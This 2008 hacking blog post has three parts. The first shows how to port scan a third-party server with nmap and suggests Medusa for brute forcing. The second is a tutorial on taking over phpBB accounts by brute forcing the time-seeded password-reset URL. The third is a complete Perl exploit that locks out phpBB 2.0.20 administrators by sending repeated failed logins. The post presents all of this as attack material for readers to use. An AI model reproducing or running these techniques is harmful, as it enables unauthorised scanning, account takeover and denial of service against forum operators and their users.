Monday, August 4, 2008

Find Port In Webservers :
Follow this...

Hi buddy just follow the below procedure to find out which ports are open on a particular system.

1. Download Nmap tool from the site www.insecure.org/nmap

2. Install it in your system.

3. Go to command prompt and just go to the path of the drive in which nmap is installed.

ex: c:\nmap

4. Now this is the command to type.

For example if u want to know about the open ports of Yahoo server.

c:\nmap nmap -sT -p 1-200 www.yahoo.com

From the above command 1-200 are the port numbers of the server u can give any number of port numbers that you want, just try this one and see. Sep 3 p@r@noid
netstat -n
try this command this will give you all the IP(s) along with port whom you are connected..
or u may try netstat -a

SAUV : u can use other scanners also to port scan a remote pc
2.try Medusa after nmap.

=====================================================================================
Reseting Phpbb Password :

Introduction:
In this tutorial I will be demonstrating the simplicity in getting around password reset systems that are based on random numbers. Specifically, we will be looking at the very popular open source forum software phpBB. I won’t be providing fully functional applications, to avoid it getting into the wrong hands, but I will illustrate enough for anyone with any coding skills to draft up their own version.

Start The Hack:
Before we start the hack there’s a few things we need to get out of the way. The first is to get the servers time. To do this, we can use a number of techniques but I won’t be going into them. I’ll simply assume that you already know how to do this. The second step is make a password reset request for the account which we want to take over. Note that the email must be sent from the system that is hosting the phpBB forum. Make note of when you make the request, this will become crucial. When the email is sent it will contain a link that will perform the actual password reset. It is this URL that we are going to try and generate with our application. An important thing to note is that the system generated reset URL is only valid for 48 hours. This means that the hack has to be carried out during that time period. Luckily that’s more than enough for us to successfully pull it off.

The Technique:
By this stage you should have already successfully sent a password reset request and made note of the time it was made. So let’s move onto how this hack is actually going to work. Essentially we’re going to generate the exact same URL that was sent in the email.

In order to do this we will need to employ the same algorithm that phpBB has used to generate the address. The way phpBB does it is by using a random number within the URL. Of course, anyone that has done any amount of coding in their life can tell you that random numbers are never truly random. All you need to produce the same random value is the seed that was used within the random number algorithm.

Most systems will use the server clock because the value is always changing and wouldn’t you believe it, that’s exactly what phpBB does. So it’s with this little bit of information that we can generate the same seed that was used when the reset password email was created. By now you’ve probably started wondering how we’re going to know what that seed is. Well the short and sweet of it is that we don’t. We’re going to be messy and brute force the seed. This is why we need to note the time the email was sent with only a small amount of certainty.

Implementing the Technique:
Since we’re going to be brute forcing things here we might as well be efficient and give ourselves a five minute buffer on either side of our recorded reset request time. This should give us a ten minute window from when the reset was mad, which ought to be plenty. The next step is to generate every possible URL that could have been generated during that time period with the intervals acting as the seed. We’ll store the URLs in memory with perhaps a linked list or an array. Ultimately the choice is up to you so long as you can access the values later on. The final step is to run through each of the generated URLs to find a successfully validated reset request.

Conclusion

While the process may seem long and tedious, through proper automation and analysis of the process there’s a number of ways that one could reduce the amount of generated results. As for those non-coders out there, this would definitely be a good start in understanding simple concepts like loops, conditionals, efficiency and regular expression.

=====================================================================================

PHPBB 2.0.20 Disable admin exploit :
Exploit from :- http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.txt

Here is the code :

###################################################################################
#!/usr/bin/perl
# Priv8 Exploit for PHPBB 2.0.20
# This Exploit Disable Admin Or other User IN PHPBB Forums For 15 Min
#Discover & Writ By : Hossein-Asgari
# http://simorgh-ev.com
# Comment : PHPBB 2.0.18 Secured Bruteforce Cracking Password !
# BUT :
# If anybody Bruteforce TO ADMIN Account --> Admin Account Is Disable .
# Enjoy !
# Advisory : http://www.simorgh-ev.com/advisory/2006/phpbb-disable-admin.pl.txt
###################################################################################
$host=$ARGV[0];
$dirc=$ARGV[1];
$port=$ARGV[2];
$user=$ARGV[3];

$dirsend = "$dirc" . "login.php";
print "
-------------------------------------
phpbb-Disable-user.php Host /Dir Port Admin
--------------------------------------
";
$i=1;
if ($host ne ""){
while($OK ne 1){


use IO::Socket;
my($socket) ="";
if ($socket = IO::Socket::INET->new(PeerAddr => $host ,
PeerPort => $port ,
Proto => "TCP"))
{


$password=rand();
$data = "username="."$user"."&password="."$password"."&redirect=&login=Connexion
";
$length = length $data;
print $socket "POST $dirsend HTTP/1.1
Host: $host
Content-Type: application/x-www-form-urlencoded
Content-Length: $length

$data";
read $socket, $answer, 15;
close($socket);
}
if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
$i=$i+"1";
print "$answer
";
print "Send Packet $i ....
" ;

}}

No comments: